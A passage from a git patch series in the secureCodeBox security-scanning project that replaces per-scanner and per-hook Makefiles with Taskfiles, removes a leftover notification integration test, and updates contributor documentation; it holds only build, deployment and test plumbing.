-#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = finding-post-processing - -include ../../hooks.mk - -deploy-test-deps: deploy-test-dep-test-scan - -.PHONY: deploy -deploy: - @echo ".: 💾 Deploying '$(name)' $(hook-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install finding-post-processing . \ - --set="hook.image.repository=docker.io/$(IMG_NS)/$(hook-prefix)-$(name)" \ - --set="hook.image.tag=$(IMG_TAG)" \ - --set="hook.image.pullPolicy=IfNotPresent" \ - --set="rules[0].matches.anyOf[0].category=Host" \ - --set="rules[0].override.severity=high" diff --git a/hooks/generic-webhook/Makefile b/hooks/generic-webhook/Makefile deleted file mode 100644 index 1743782cc8..0000000000 --- a/hooks/generic-webhook/Makefile +++ /dev/null @@ -1,22 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = generic-webhook - -include ../../hooks.mk - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-http-webhook deploy-test-dep-test-scan - -.PHONY: deploy -deploy: - @echo ".: 💾 Deploying '$(name)' $(hook-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install ro-hook . \ - --set="hook.image.repository=docker.io/$(IMG_NS)/$(hook-prefix)-$(name)" \ - --set="hook.image.tag=$(IMG_TAG)" \ - --set="webhookUrl=http://http-webhook/hallo-welt" \ No newline at end of file diff --git a/hooks/notification/Makefile b/hooks/notification/Makefile deleted file mode 100644 index f258990ccc..0000000000 --- a/hooks/notification/Makefile +++ /dev/null @@ -1,23 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = notification - -include ../../hooks.mk - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-test-scan deploy-test-dep-http-webhook - -.PHONY: deploy -deploy: - @echo ".: 💾 Deploying '$(name)' $(hook-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install notification-hook . \ - --values ../../tests/integration/hooks/__testFiles__/notification-values.yaml \ - --set="hook.image.repository=docker.io/$(IMG_NS)/$(hook-prefix)-$(name)" \ - --set="hook.image.tag=$(IMG_TAG)" \ - --set="hook.image.pullPolicy=IfNotPresent" diff --git a/hooks/persistence-azure-monitor/Makefile b/hooks/persistence-azure-monitor/Makefile deleted file mode 100644 index e825bc975f..0000000000 --- a/hooks/persistence-azure-monitor/Makefile +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = persistence-azure-monitor - -include ../../hooks.mk - -.PHONY: unit-tests -unit-tests: - @$(MAKE) -s unit-test-js diff --git a/hooks/persistence-defectdojo/Makefile b/hooks/persistence-defectdojo/Makefile deleted file mode 100644 index 566197cc64..0000000000 --- a/hooks/persistence-defectdojo/Makefile +++ /dev/null @@ -1,19 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = persistence-defectdojo - -include ../../hooks.mk - -.PHONY: unit-tests -unit-tests: - @$(MAKE) -s unit-test-java - -.PHONY: integration-tests -integration-tests: ## đŸŠē Start integration test for this module in the namespace "integration-tests" - @echo "No integration tests for $(hook) defined!" \ No newline at end of file diff --git a/hooks/persistence-dependencytrack/Makefile b/hooks/persistence-dependencytrack/Makefile deleted file mode 100644 index 03cd8ff196..0000000000 --- a/hooks/persistence-dependencytrack/Makefile +++ /dev/null @@ -1,10 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 - -include_guard = set -hook = persistence-dependencytrack - -include ../../hooks.mk diff --git a/hooks/persistence-elastic/Makefile b/hooks/persistence-elastic/Makefile deleted file mode 100644 index d8c56c7577..0000000000 --- a/hooks/persistence-elastic/Makefile +++ /dev/null @@ -1,49 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = persistence-elastic - -include ../../hooks.mk - -.PHONY: docker-build -docker-build: dashboard-importer-docker-build - -.PHONY: docker-export -docker-export: dashboard-importer-docker-export - -.PHONY: kind-import -kind-import: dashboard-importer-kind-import - -.PHONY: dashboard-importer-docker-build -dashboard-importer-docker-build: - @echo ".: ⚙ī¸ Build '$(name)' dashboard-importer with BASE_IMG_TAG: '$(BASE_IMG_TAG)'." - docker build \ - --build-arg=scannerVersion=$(shell yq e .appVersion ./Chart.yaml) \ - --build-arg=baseImageTag=$(BASE_IMG_TAG) \ - --build-arg=namespace=$(IMG_NS) \ - -t $(IMG_NS)/$(name)-dashboard-importer:$(IMG_TAG) \ - -f ./dashboard-importer/Dockerfile \ - ./dashboard-importer - -.PHONY: dashboard-importer-docker-export -dashboard-importer-docker-export: - @echo ".: ⚙ī¸ Saving new docker image archive to '$(name)-dashboard-importer.tar'." - docker save $(IMG_NS)/$(name)-dashboard-importer:$(IMG_TAG) -o $(name)-dashboard-importer.tar - -.PHONY: dashboard-importer-kind-import -dashboard-importer-kind-import: - @echo ".: 💾 Importing the image archive '$(name)-dashboard-importer.tar' to local kind cluster." - kind load image-archive ./$(name)-dashboard-importer.tar --name $(KIND_CLUSTER_NAME) - -.PHONY: deploy -deploy: ## 💾 Deploy this module via HelmChart into namespace "integration-tests" - @echo ".: 💾 Deploying '$(name)' $(hook-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install $(name) . --debug --timeout 5m --wait \ - --set="hook.image.repository=docker.io/$(IMG_NS)/$(hook-prefix)-$(name)" \ - --set="hook.image.tag=$(IMG_TAG)" \ - --set="dashboardImporter.image.tag=$(IMG_TAG)" diff --git a/hooks/update-field-hook/Makefile b/hooks/update-field-hook/Makefile deleted file mode 100644 index 998e48adce..0000000000 --- a/hooks/update-field-hook/Makefile +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -hook = update-field-hook - -include ../../hooks.mk - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-test-scan - -.PHONY: deploy -deploy: - @echo ".: 💾 Deploying '$(name)' $(hook-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install update-category . --wait \ - --set="hook.image.repository=docker.io/$(IMG_NS)/$(hook-prefix)-$(name)" \ - --set="hook.image.tag=$(IMG_TAG)" \ - --set="attribute.name=category" \ - --set="attribute.value=fancy-category" - helm -n integration-tests upgrade --install update-severity . --wait \ - --set="hook.image.repository=docker.io/$(IMG_NS)/$(hook-prefix)-$(name)" \ - --set="hook.image.tag=$(IMG_TAG)" \ - --set="attribute.name=severity" \ - --set="attribute.value=high" \ No newline at end of file diff --git a/scanners/Makefile b/scanners/Makefile deleted file mode 100644 index d671dadc69..0000000000 --- a/scanners/Makefile +++ /dev/null @@ -1,32 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include ../prerequisites.mk - -.PHONY: integration-tests -integration-tests: - for dir in $(wildcard */.); do \ - $(MAKE) integration-tests -C $$dir;\ - done - -.PHONY: unit-tests -unit-tests: - for dir in $(wildcard */.); do \ - $(MAKE) unit-tests -C $$dir;\ - done - -.PHONY: helm-unit-tests -helm-unit-tests: - set -e; \ - for directory in ./*; do \ - if [ -d "$$directory" ]; then \ - dir_name=$$(basename "$$directory"); \ - if [ "$$dir_name" != "coverage" ] && [ "$$dir_name" != "node_modules" ] && [ "$$dir_name" != "__snapshots__" ] && [ "$$dir_name" != "__testFiles__" ]; then \ - helm unittest "$$directory"; \ - fi; \ - fi; \ - done diff --git a/scanners/amass/Makefile b/scanners/amass/Makefile deleted file mode 100644 index c9cc98bb7f..0000000000 --- a/scanners/amass/Makefile +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = amass -custom_scanner = set - -include ../../scanners.mk diff --git a/scanners/cmseek/Makefile b/scanners/cmseek/Makefile deleted file mode 100644 index d202a1075f..0000000000 --- a/scanners/cmseek/Makefile +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = cmseek -custom_scanner = set - -include ../../scanners.mk - -.PHONY: deploy-test-deps -deploy-test-deps: | deploy-test-dep-old-joomla diff --git a/scanners/ffuf/Makefile b/scanners/ffuf/Makefile deleted file mode 100644 index c8eb5edee9..0000000000 --- a/scanners/ffuf/Makefile +++ /dev/null @@ -1,16 +0,0 @@ -#!/usr/bin/make -fq -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = ffuf -custom_scanner = set - -include ../../scanners.mk - -deploy-test-deps: deploy-test-dep-juiceshop - kubectl apply -f ./integration-tests/configmap-wordlist.yaml -n integration-tests - diff --git a/scanners/git-repo-scanner/Makefile b/scanners/git-repo-scanner/Makefile deleted file mode 100644 index e67f54c8ff..0000000000 --- a/scanners/git-repo-scanner/Makefile +++ /dev/null @@ -1,17 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = git-repo-scanner -custom_scanner = set - -include ../../scanners.mk - -.PHONY: unit-tests -unit-tests: - @$(MAKE) -s unit-test-py - diff --git a/scanners/gitleaks/Makefile b/scanners/gitleaks/Makefile deleted file mode 100644 index 281cae8883..0000000000 --- a/scanners/gitleaks/Makefile +++ /dev/null @@ -1,11 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = gitleaks - -include ../../scanners.mk diff --git a/scanners/kube-hunter/Makefile b/scanners/kube-hunter/Makefile deleted file mode 100644 index a539cda6db..0000000000 --- a/scanners/kube-hunter/Makefile +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = kube-hunter -custom_scanner = set - -include ../../scanners.mk diff --git a/scanners/ncrack/Makefile b/scanners/ncrack/Makefile deleted file mode 100644 index 00c679da3d..0000000000 --- a/scanners/ncrack/Makefile +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = ncrack -custom_scanner = set - -include ../../scanners.mk - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-dummy-ssh diff --git a/scanners/nikto/Makefile b/scanners/nikto/Makefile deleted file mode 100644 index b75a753216..0000000000 --- a/scanners/nikto/Makefile +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = nikto -custom_scanner = set - -include ../../scanners.mk - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-bodgeit diff --git a/scanners/nmap/Makefile b/scanners/nmap/Makefile deleted file mode 100644 index eeaa10300c..0000000000 --- a/scanners/nmap/Makefile +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = nmap -custom_scanner = set - -include ../../scanners.mk diff --git a/scanners/nuclei/Makefile b/scanners/nuclei/Makefile deleted file mode 100644 index c6fdefd028..0000000000 --- a/scanners/nuclei/Makefile +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = nuclei - -include ../../scanners.mk - -.PHONY: deploy-without-scanner -deploy-without-scanner: - @echo ".: 💾 Deploying '$(name)' $(scanner-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install $(name) ./ --wait \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-$(name)" \ - --set="parser.image.tag=$(IMG_TAG)" \ - --set="parser.env[0].name=CRASH_ON_FAILED_VALIDATION" \ - --set-string="parser.env[0].value=true" \ - --set="nucleiTemplateCache.enabled=false" - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-bodgeit diff --git a/scanners/screenshooter/Makefile b/scanners/screenshooter/Makefile deleted file mode 100644 index c4dbfc4f4f..0000000000 --- a/scanners/screenshooter/Makefile +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = screenshooter -custom_scanner = set - -include ../../scanners.mk - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-nginx diff --git a/scanners/semgrep/Makefile b/scanners/semgrep/Makefile deleted file mode 100644 index 93bd2b612a..0000000000 --- a/scanners/semgrep/Makefile +++ /dev/null @@ -1,14 +0,0 @@ -#!/usr/bin/make -f - -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 - -include_guard = set # Always include this line (checked in the makefile framework) -scanner = semgrep - -include ../../scanners.mk # Ensures that all the default makefile targets are included - -deploy-test-deps: - @echo ".: đŸŠē Deploying test dependencies for Semgrep in kind namespace 'integration-tests'." - kubectl -n integration-tests create configmap semgrep-test-file --from-file=integration-tests/testfile.py diff --git a/scanners/ssh-audit/Makefile b/scanners/ssh-audit/Makefile deleted file mode 100644 index ba7a9090cd..0000000000 --- a/scanners/ssh-audit/Makefile +++ /dev/null @@ -1,15 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = ssh-audit -custom_scanner = set - -include ../../scanners.mk - -.PHONY: deploy-test-deps -deploy-test-deps: deploy-test-dep-dummy-ssh \ No newline at end of file diff --git a/scanners/sslyze/Makefile b/scanners/sslyze/Makefile deleted file mode 100644 index c78948f1b8..0000000000 --- a/scanners/sslyze/Makefile +++ /dev/null @@ -1,14 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = sslyze -custom_scanner = set - -include ../../scanners.mk - -deploy-test-deps: deploy-test-dep-unsafe-https diff --git a/scanners/test-scan/Makefile b/scanners/test-scan/Makefile deleted file mode 100644 index 1a2e7a806c..0000000000 --- a/scanners/test-scan/Makefile +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = test-scan -custom_scanner = set - -include ../../scanners.mk diff --git a/scanners/trivy-sbom/Makefile b/scanners/trivy-sbom/Makefile deleted file mode 100644 index 1ebc6a0b67..0000000000 --- a/scanners/trivy-sbom/Makefile +++ /dev/null @@ -1,11 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = trivy-sbom - -include ../../scanners.mk diff --git a/scanners/trivy/Makefile b/scanners/trivy/Makefile deleted file mode 100644 index 89985fe040..0000000000 --- a/scanners/trivy/Makefile +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = trivy - -include ../../scanners.mk - -.PHONY: deploy-without-scanner -deploy-without-scanner: - @echo ".: 💾 Deploying '$(name)' $(scanner-prefix) HelmChart with the docker tag '$(IMG_TAG)' into kind namespace 'integration-tests'." - helm -n integration-tests upgrade --install $(name) ./ --wait \ - --set="parser.image.repository=docker.io/$(IMG_NS)/$(parser-prefix)-$(name)" \ - --set="parser.image.tag=$(IMG_TAG)" \ - --set="parser.env[0].name=CRASH_ON_FAILED_VALIDATION" \ - --set-string="parser.env[0].value=true" \ - --set="k8sScanScope=cluster" \ No newline at end of file diff --git a/scanners/whatweb/Makefile b/scanners/whatweb/Makefile deleted file mode 100644 index 6b1f1aef49..0000000000 --- a/scanners/whatweb/Makefile +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = whatweb -custom_scanner = set - -include ../../scanners.mk diff --git a/scanners/wpscan/Makefile b/scanners/wpscan/Makefile deleted file mode 100644 index 1eabd323b5..0000000000 --- a/scanners/wpscan/Makefile +++ /dev/null @@ -1,14 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = wpscan -custom_scanner = set - -include ../../scanners.mk - -deploy-test-deps: deploy-test-dep-old-wordpress diff --git a/scanners/zap-automation-framework/Makefile b/scanners/zap-automation-framework/Makefile deleted file mode 100644 index 60e2154d1e..0000000000 --- a/scanners/zap-automation-framework/Makefile +++ /dev/null @@ -1,14 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = zap-automation-framework - -include ../../scanners.mk - -deploy-test-deps: deploy-test-dep-juiceshop deploy-test-dep-nginx deploy-test-dep-bodgeit deploy-test-dep-petstore - kubectl apply -f ./integration-tests/automation-framework-configMap.yaml -n integration-tests From 07413fd8ac607a31bda86d999ae6994712b25246 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 10:34:38 +0200 Subject: [PATCH 122/137] Delete left over test file --- tests/integration/hooks/notification.test.js | 82 -------------------- 1 file changed, 82 deletions(-) delete mode 100644 tests/integration/hooks/notification.test.js diff --git a/tests/integration/hooks/notification.test.js b/tests/integration/hooks/notification.test.js deleted file mode 100644 index fefe51674c..0000000000 --- a/tests/integration/hooks/notification.test.js +++ /dev/null @@ -1,82 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -const { scan } = require("../helpers"); -const k8s = require("@kubernetes/client-node"); - -jest.retryTimes(3); - -test( - "should trigger notification", - async () => { - await scan("test-scan-notification-web-hook", "test-scan", [], 90); - - const WEBHOOK = "http-webhook"; - const NAMESPACE = "integration-tests"; - - const kc = new k8s.KubeConfig(); - kc.loadFromDefault(); - - const k8sApi = kc.makeApiClient(k8s.CoreV1Api); - - function containsPod(item) { - return item.metadata.name.includes(WEBHOOK); - } - - let podName; - await k8sApi.listNamespacedPod(NAMESPACE, "true").then((res) => { - let podArray = res.body.items.filter(containsPod); - if (podArray.length === 0) { - throw new Error(`Did not find Pod for "${WEBHOOK}" Hook`); - } - - podName = podArray[0].metadata.name; - }); - - const containerName = WEBHOOK; - - const params = { - k8sApi, - podName, - namespace: NAMESPACE, - containerName, - }; - const result = await delayedRepeat(isHookTriggered, params, 1000, 10); - - expect(result).toBe(true); - }, - 3 * 60 * 1000, -); - -async function isHookTriggered(params) { - console.log("Fetch Container Logs..."); - let containerLog = await params.k8sApi.readNamespacedPodLog( - params.podName, - params.namespace, - params.containerName, - false, - ); - return containerLog.body.includes("/slack-notification"); -} - -const sleep = (durationInMs) => - new Promise((resolve) => setTimeout(resolve, durationInMs)); - -async function delayedRepeat( - fun, - functionParamObject, - intervalInMs, - maxRetries, -) { - for (let i = 0; i < maxRetries; i++) { - const condition = await fun(functionParamObject); - if (condition) { - return condition; - } - - await sleep(intervalInMs); - } - - throw new Error("Reached max retries"); -} From 4e01f4e894c4101a68f3ba882030e87947e517af Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Fri, 11 Jul 2025 10:35:09 +0200 Subject: [PATCH 123/137] Update docs and new scanner templates for the esm and task file changes --- .templates/new-scanner/Makefile | 12 -- .templates/new-scanner/Taskfile.yaml | 14 ++ .../integration-tests/jest.config.json | 1 - .../jest.config.json.license | 3 - .../integration-tests/new-scanner.test.js | 29 +-- .templates/new-scanner/parser/parser.js | 4 +- .templates/new-scanner/parser/parser.test.js | 14 +- .../integrating-a-hook/integrating-a-hook.md | 2 +- .../integrating-a-hook/integration-tests.md | 4 +- .../integrating-a-hook/makefile.md | 8 +- .../integrating-a-hook/taskfile.md | 126 +++++++++++ .../integrating-a-scanner.md | 4 +- .../integration-tests.md | 4 +- .../integrating-a-scanner/makefile.md | 144 ++++++++----- .../integrating-a-scanner/parser-dir.md | 17 +- .../integrating-a-scanner/taskfile.md | 131 ++++++++++++ .../docs/contributing/local-deployment.md | 201 +++++++++++------- .../contributing/test-concept/hook-test.md | 8 +- .../docs/contributing/test-concept/index.md | 4 +- .../contributing/test-concept/scanner-test.md | 6 +- 20 files changed, 545 insertions(+), 191 deletions(-) delete mode 100644 .templates/new-scanner/Makefile create mode 100644 .templates/new-scanner/Taskfile.yaml delete mode 100644 .templates/new-scanner/integration-tests/jest.config.json delete mode 100644 .templates/new-scanner/integration-tests/jest.config.json.license create mode 100644 documentation/docs/contributing/integrating-a-hook/taskfile.md create mode 100644 documentation/docs/contributing/integrating-a-scanner/taskfile.md diff --git a/.templates/new-scanner/Makefile b/.templates/new-scanner/Makefile deleted file mode 100644 index e070cd36ac..0000000000 --- a/.templates/new-scanner/Makefile +++ /dev/null @@ -1,12 +0,0 @@ -#!/usr/bin/make -f -# -# SPDX-FileCopyrightText: the secureCodeBox authors -# -# SPDX-License-Identifier: Apache-2.0 -# - -include_guard = set -scanner = new-scanner -custom_scanner = set - -include ../../scanners.mk diff --git a/.templates/new-scanner/Taskfile.yaml b/.templates/new-scanner/Taskfile.yaml new file mode 100644 index 0000000000..38fdec6ea6 --- /dev/null +++ b/.templates/new-scanner/Taskfile.yaml @@ -0,0 +1,14 @@ +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +version: "3" + +includes: + scanner: + taskfile: ../Taskfile.yaml + flatten: true + vars: + scannerName: new-scanner + +tasks: {} diff --git a/.templates/new-scanner/integration-tests/jest.config.json b/.templates/new-scanner/integration-tests/jest.config.json deleted file mode 100644 index 0967ef424b..0000000000 --- a/.templates/new-scanner/integration-tests/jest.config.json +++ /dev/null @@ -1 +0,0 @@ -{} diff --git a/.templates/new-scanner/integration-tests/jest.config.json.license b/.templates/new-scanner/integration-tests/jest.config.json.license deleted file mode 100644 index 3034c0d74b..0000000000 --- a/.templates/new-scanner/integration-tests/jest.config.json.license +++ /dev/null @@ -1,3 +0,0 @@ -SPDX-FileCopyrightText: the secureCodeBox authors - -SPDX-License-Identifier: Apache-2.0 \ No newline at end of file diff --git a/.templates/new-scanner/integration-tests/new-scanner.test.js b/.templates/new-scanner/integration-tests/new-scanner.test.js index 4136ea1e92..c4b5e36811 100644 --- a/.templates/new-scanner/integration-tests/new-scanner.test.js +++ b/.templates/new-scanner/integration-tests/new-scanner.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "localhost scan should find at least one finding", @@ -13,28 +11,31 @@ test( "new-scanner-localhost", "new-scanner", ["localhost"], - 90 + 90, ); - // TODO: Implement at least one scanner specific integration test + // TODO: Implement at least one scanner specific integration test expect(count).toBeGreaterThanOrEqual(1); - expect(severities).toMatchInlineSnapshot(` - Object { - "INFORMATIONAL": 1, - } - `); + expect(severities).toMatchObject({ + informational: 1, + }); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); test( "invalid scan parameters should be marked as errored", async () => { await expect( - scan("new-scanner-localhost", "new-scanner", ["-invalidFlag", "localhost"], 90) + scan( + "new-scanner-localhost", + "new-scanner", + ["-invalidFlag", "localhost"], + 90, + ), ).rejects.toThrow( - 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"' + 'Scan failed with description "Failed to run the Scan Container, check k8s Job and its logs for more details"', ); }, - 3 * 60 * 1000 + { timeout: 3 * 60 * 1000 }, ); diff --git a/.templates/new-scanner/parser/parser.js b/.templates/new-scanner/parser/parser.js index 5503ac7763..b60edbf2cd 100644 --- a/.templates/new-scanner/parser/parser.js +++ b/.templates/new-scanner/parser/parser.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(fileContent) { +export async function parse(fileContent) { const targets = parseResultFile(fileContent); return transformToFindings(targets); } @@ -29,5 +29,3 @@ function parseResultFile(fileContent) { } return targetList; } - -module.exports.parse = parse; diff --git a/.templates/new-scanner/parser/parser.test.js b/.templates/new-scanner/parser/parser.test.js index f7eb66cc09..f747350079 100644 --- a/.templates/new-scanner/parser/parser.test.js +++ b/.templates/new-scanner/parser/parser.test.js @@ -2,18 +2,14 @@ // // SPDX-License-Identifier: Apache-2.0 -const { readFile } = require("fs/promises"); -const util = require("util"); +import { readFile } from "node:fs/promises"; +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); - -const { parse } = require("./parser"); +import { parse } from "./parser"; test("should properly parse new-scanner json file", async () => { const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/example.com.json", { + await readFile(import.meta.dirname + "/__testFiles__/example.com.json", { encoding: "utf8", }) ); @@ -25,7 +21,7 @@ test("should properly parse new-scanner json file", async () => { test("should properly parse empty json file", async () => { const fileContent = JSON.parse( - await readFile(__dirname + "/__testFiles__/empty.json", { + await readFile(import.meta.dirname + "/__testFiles__/empty.json", { encoding: "utf8", }) ); diff --git a/documentation/docs/contributing/integrating-a-hook/integrating-a-hook.md b/documentation/docs/contributing/integrating-a-hook/integrating-a-hook.md index 52da4d2ad2..e246ca0051 100644 --- a/documentation/docs/contributing/integrating-a-hook/integrating-a-hook.md +++ b/documentation/docs/contributing/integrating-a-hook/integrating-a-hook.md @@ -30,7 +30,7 @@ The directory structure of a hook Helm Chart will look something like this: │   └── NOTES.txt ├── Chart.yaml ├── values.yaml -├── Makefile +├── Taskfile.yaml ├── README.md ├── .helm-docs.gotmpl ├── .helmignore diff --git a/documentation/docs/contributing/integrating-a-hook/integration-tests.md b/documentation/docs/contributing/integrating-a-hook/integration-tests.md index 30082281ce..78bafd7ca2 100644 --- a/documentation/docs/contributing/integrating-a-hook/integration-tests.md +++ b/documentation/docs/contributing/integrating-a-hook/integration-tests.md @@ -18,7 +18,7 @@ to test your hook is by running it after test-scan or against a scan of a `demo- Let's have a look at the [read-write-hook](https://github.com/secureCodeBox/secureCodeBox/blob/main/tests/integration/generic/read-write-hook.test.js) test to understand all the steps required: ```javascript -const { scan } = require("../helpers"); +import { scan } from "../../../tests/integration/helpers.js"; test( "localhost port scan should only find a host finding", @@ -64,7 +64,7 @@ higher than the timeout provided above. ## Run your integration tests locally -Before pushing them to the repository, make sure your tests run successfully in your local cluster. You may use the [makefile](/docs/contributing/integrating-a-hook/makefile) to run your integration tests locally. +Before pushing them to the repository, make sure your tests run successfully in your local cluster. You may use the [Taskfile](/docs/contributing/integrating-a-hook/taskfile) to run your integration tests locally. ## Integrate in ci.yaml diff --git a/documentation/docs/contributing/integrating-a-hook/makefile.md b/documentation/docs/contributing/integrating-a-hook/makefile.md index 4019c360a7..44452650e5 100644 --- a/documentation/docs/contributing/integrating-a-hook/makefile.md +++ b/documentation/docs/contributing/integrating-a-hook/makefile.md @@ -3,10 +3,14 @@ # # SPDX-License-Identifier: Apache-2.0 -title: Makefile -sidebar_position: 4 +title: Makefile (Deprecated) +sidebar_position: 5 --- +:::caution Deprecated +Makefiles have been deprecated in favor of Taskfiles. Please refer to the [Taskfile](./taskfile.md) documentation for the current approach. +::: + To test your hook locally, you may use the following makefile. ```makefile diff --git a/documentation/docs/contributing/integrating-a-hook/taskfile.md b/documentation/docs/contributing/integrating-a-hook/taskfile.md new file mode 100644 index 0000000000..aa4e68944a --- /dev/null +++ b/documentation/docs/contributing/integrating-a-hook/taskfile.md @@ -0,0 +1,126 @@ +--- +# SPDX-FileCopyrightText: the secureCodeBox authors +# +# SPDX-License-Identifier: Apache-2.0 + +title: Taskfile +sidebar_position: 4 +--- + +To test your hook locally, you'll use a Taskfile.yaml configuration. The secureCodeBox project has migrated from Makefiles to [Task](https://taskfile.dev/) for better maintainability and cross-platform support. + +## Basic Hook Taskfile + +Create a 